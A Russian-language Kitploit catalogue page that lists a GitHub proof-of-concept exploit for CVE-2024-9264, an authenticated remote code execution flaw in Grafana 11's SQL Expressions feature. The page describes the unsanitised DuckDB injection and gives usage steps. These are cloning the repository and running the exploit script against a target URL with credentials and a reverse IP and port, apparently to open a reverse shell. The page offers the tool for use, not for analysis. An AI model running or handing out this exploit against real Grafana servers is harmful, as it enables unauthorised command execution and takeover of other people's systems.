Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/rvzsec/cve-2024-9264
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubrvzsec/cve-2024-9264

CVE-2024-9264

Аутентифицированный RCE в Grafana (v11.0) через SQL Expressions - PoC-эксплойт

Репозиторий
221 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-9264

Аутентифицированный RCE в Grafana (v11.0) через SQL Expressions — PoC-эксплойт



logo

CVE-2024-9264 — Grafana v11.0
Аутентифицированное удалённое выполнение кода (RCE)

PoC


Введение

CVE-2024-9264 — это критическая уязвимость удалённого выполнения кода и локального включения файлов, появившаяся в экспериментальной функции Grafana 11 «SQL Expressions». API передаёт пользовательский SQL напрямую в DuckDB CLI без надлежащей санитизации, поэтому любая аутентифицированная учётная запись с правами Viewer или выше может внедрять shell-команды или читать произвольные файлы, при условии, что бинарный файл duckdb находится в PATH сервера.


Использование

root@kitploit:~
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh

# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>

Пример:

root@kitploit:~
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337
Скачать инструмент